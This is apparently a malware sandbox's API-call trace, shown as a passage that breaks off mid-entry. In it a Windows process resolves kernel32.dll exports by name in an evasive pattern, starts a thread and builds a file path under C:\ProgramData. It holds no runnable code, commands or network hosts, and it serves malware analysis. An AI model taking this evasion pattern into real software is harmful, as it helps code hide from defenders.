[0178.391] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0178.391] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0178.392] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0178.392] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0178.392] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0178.392] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0178.392] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0178.392] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0178.392] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0178.392] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0178.392] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0178.392] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0178.392] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0178.392] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0178.392] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0178.392] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0178.392] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0178.392] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0178.392] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0178.392] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0178.392] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0178.392] lstrlenA (lpString="CREATETHREAD") returned 12 [0178.392] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0178.392] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0178.392] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0178.392] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0178.392] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0178.392] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0178.392] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0178.392] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0178.392] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0178.392] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0178.392] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0178.392] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0178.392] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0178.392] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0178.392] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0178.392] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0178.392] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0178.393] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0178.393] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0178.393] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0178.393] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0178.393] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0178.393] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0178.393] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0178.393] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0178.393] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0178.393] lstrcpyA (in: lpString1=0x2398df8, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0178.393] lstrlenA (lpString="CTRLROUTINE") returned 11 [0178.393] lstrcpyA (in: lpString1=0x2398df8, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0178.393] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0178.393] lstrcpyA (in: lpString1=0x2398df8, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0178.393] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0178.393] lstrcpyA (in: lpString1=0x2398df8, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0178.393] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0178.393] lstrcpyA (in: lpString1=0x2398df8, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0178.393] lstrlenA (lpString="DEBUGBREAK") returned 10 [0178.393] lstrcpyA (in: lpString1=0x2398df8, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0178.393] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0178.393] lstrcpyA (in: lpString1=0x2398df8, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0178.393] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0178.393] lstrcpyA (in: lpString1=0x2398df8, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0178.393] lstrlenA (lpString="DECODEPOINTER") returned 13 [0178.393] lstrcpyA (in: lpString1=0x2398df8, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0178.393] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0178.393] lstrcpyA (in: lpString1=0x2398df8, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0178.393] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0178.393] lstrcpyA (in: lpString1=0x2398df8, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0178.393] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0178.393] lstrcpyA (in: lpString1=0x2398df8, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0178.393] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0178.393] lstrcpyA (in: lpString1=0x2398df8, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0178.393] lstrlenA (lpString="DELETEATOM") returned 10 [0178.393] lstrcpyA (in: lpString1=0x2398df8, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0178.394] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0178.394] lstrcpyA (in: lpString1=0x2398df8, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0178.394] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0178.394] lstrcpyA (in: lpString1=0x2398df8, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0178.394] lstrlenA (lpString="DELETEFIBER") returned 11 [0178.394] lstrcpyA (in: lpString1=0x2398df8, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0178.394] lstrlenA (lpString="DELETEFILEA") returned 11 [0178.394] lstrcpyA (in: lpString1=0x2398df8, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0178.394] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0178.394] lstrcpyA (in: lpString1=0x2398df8, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0178.394] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0178.394] lstrcpyA (in: lpString1=0x2398df8, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0178.394] lstrlenA (lpString="DELETEFILEW") returned 11 [0178.394] lstrcpyA (in: lpString1=0x2398df8, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0178.394] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0178.394] lstrcpyA (in: lpString1=0x2398df8, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0178.394] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0178.394] lstrcpyA (in: lpString1=0x2398df8, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0178.394] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0178.394] lstrcpyA (in: lpString1=0x2398df8, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0178.394] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0178.394] lstrcpyA (in: lpString1=0x2398df8, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0178.394] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0178.394] lstrcpyA (in: lpString1=0x2398df8, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0178.394] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0178.394] lstrcpyA (in: lpString1=0x2398df8, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0178.394] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0178.394] lstrcpyA (in: lpString1=0x2398df8, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0178.394] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0178.394] lstrcpyA (in: lpString1=0x2398df8, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0178.394] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0178.394] lstrcpyA (in: lpString1=0x2398df8, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0178.395] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0178.395] lstrcpyA (in: lpString1=0x2398df8, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0178.395] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0178.395] lstrcpyA (in: lpString1=0x2398df8, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0178.395] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0178.395] lstrcpyA (in: lpString1=0x2398df8, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0178.395] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0178.395] lstrcpyA (in: lpString1=0x2398df8, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0178.395] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0178.395] lstrcpyA (in: lpString1=0x2398df8, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0178.395] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0178.395] lstrcpyA (in: lpString1=0x2398df8, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0178.395] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0178.395] lstrcpyA (in: lpString1=0x2398df8, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0178.395] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0178.395] lstrcpyA (in: lpString1=0x2398df8, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0178.396] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0178.396] lstrcpyA (in: lpString1=0x2398df8, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0178.396] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0178.396] lstrcpyA (in: lpString1=0x2398df8, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0178.396] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0178.396] lstrcpyA (in: lpString1=0x2398df8, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0178.396] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0178.396] lstrcpyA (in: lpString1=0x2398df8, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0178.396] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0178.396] lstrcpyA (in: lpString1=0x2398df8, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0178.396] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0178.396] lstrcpyA (in: lpString1=0x2398df8, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0178.396] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0178.396] lstrcpyA (in: lpString1=0x2398df8, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0178.396] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0178.396] lstrcpyA (in: lpString1=0x2398df8, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0178.396] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0178.396] lstrcpyA (in: lpString1=0x2398df8, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0178.396] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0178.396] lstrcpyA (in: lpString1=0x2398df8, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0178.396] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0178.396] lstrcpyA (in: lpString1=0x2398df8, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0178.396] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0178.396] lstrcpyA (in: lpString1=0x2398df8, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0178.396] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0178.396] lstrcpyA (in: lpString1=0x2398df8, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0178.396] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0178.396] lstrcpyA (in: lpString1=0x2398df8, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0178.396] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0178.396] lstrcpyA (in: lpString1=0x2398df8, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0178.396] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0178.396] lstrcpyA (in: lpString1=0x2398df8, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0178.397] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x430000 [0178.397] VirtualAlloc (lpAddress=0x0, dwSize=0xf0, flAllocationType=0x3000, flProtect=0x4) returned 0x440000 [0178.397] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x550000 [0178.398] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0x560000 [0178.398] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xb29c0, lpParameter=0x550000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ec [0178.398] CloseHandle (hObject=0x1ec) returned 1 [0178.401] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x3a0004 | out: pszPath="C:\\ProgramData") returned 0x0 [0178.406] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\0x29A.db" | out: lpString1="C:\\ProgramData\\0x29A.db") returned="C:\\ProgramData\\0x29A.db" [0178.406] lstrlenA (lpString="kernel32.dll") returned 12 [0178.407] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0178.407] lstrcpyA (in: lpString1=0x239db44, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0178.407] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0178.407] lstrcpyA (in: lpString1=0x239db44, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0178.407] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0178.407] lstrcpyA (in: lpString1=0x239db44, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0178.407] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0178.407] lstrcpyA (in: lpString1=0x239db44, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0178.407] lstrlenA (lpString="ADDATOMA") returned 8 [0178.407] lstrcpyA (in: lpString1=0x239db44, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0178.407] lstrlenA (lpString="ADDATOMW") returned 8 [0178.407] lstrcpyA (in: lpString1=0x239db44, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0178.407] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0178.407] lstrcpyA (in: lpString1=0x239db44, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0178.407] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0178.407] lstrcpyA (in: lpString1=0x239db44, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0178.407] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0178.407] lstrcpyA (in: lpString1=0x239db44, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0178.407] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0178.407] lstrcpyA (in: lpString1=0x239db44, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0178.407] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0178.407] lstrcpyA (in: lpString1=0x239db44, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0178.407] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0178.407] lstrcpyA (in: lpString1=0x239db44, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0178.407] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0178.407] lstrcpyA (in: lpString1=0x239db44, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0178.407] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0178.407] lstrcpyA (in: lpString1=0x239db44, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0178.407] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0178.407] lstrcpyA (in: lpString1=0x239db44, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0178.407] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0178.407] lstrcpyA (in: lpString1=0x239db44, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0178.407] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0178.407] lstrcpyA (in: lpString1=0x239db44, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0178.407] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0178.407] lstrcpyA (in: lpString1=0x239db44, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0178.407] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0178.407] lstrcpyA (in: lpString1=0x239db44, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0178.408] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0178.408] lstrcpyA (in: lpString1=0x239db44, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0178.408] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0178.408] lstrcpyA (in: lpString1=0x239db44, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0178.408] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0178.408] lstrcpyA (in: lpString1=0x239db44, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0178.408] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0178.408] lstrcpyA (in: lpString1=0x239db44, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0178.408] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0178.408] lstrcpyA (in: lpString1=0x239db44, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0178.408] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0178.408] lstrcpyA (in: lpString1=0x239db44, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0178.408] lstrlenA (lpString="BACKUPREAD") returned 10 [0178.408] lstrcpyA (in: lpString1=0x239db44, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0178.408] lstrlenA (lpString="BACKUPSEEK") returned 10 [0178.408] lstrcpyA (in: lpString1=0x239db44, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0178.408] lstrlenA (lpString="BACKUPWRITE") returned 11 [0178.408] lstrcpyA (in: lpString1=0x239db44, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0178.408] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0178.408] lstrcpyA (in: lpString1=0x239db44, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0178.408] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0178.408] lstrcpyA (in: lpString1=0x239db44, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0178.408] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0178.408] lstrcpyA (in: lpString1=0x239db44, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0178.408] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0178.408] lstrcpyA (in: lpString1=0x239db44, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0178.408] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0178.408] lstrcpyA (in: lpString1=0x239db44, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0178.408] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0178.408] lstrcpyA (in: lpString1=0x239db44, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0178.408] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0178.408] lstrcpyA (in: lpString1=0x239db44, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0178.408] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0178.408] lstrcpyA (in: lpString1=0x239db44, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0178.408] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0178.408] lstrcpyA (in: lpString1=0x239db44, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0178.408] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0178.409] lstrcpyA (in: lpString1=0x239db44, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0178.409] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0178.409] lstrcpyA (in: lpString1=0x239db44, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0178.409] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0178.409] lstrcpyA (in: lpString1=0x239db44, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0178.409] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0178.409] lstrcpyA (in: lpString1=0x239db44, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0178.409] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0178.409] lstrcpyA (in: lpString1=0x239db44, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0178.409] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0178.409] lstrcpyA (in: lpString1=0x239db44, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0178.409] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0178.409] lstrcpyA (in: 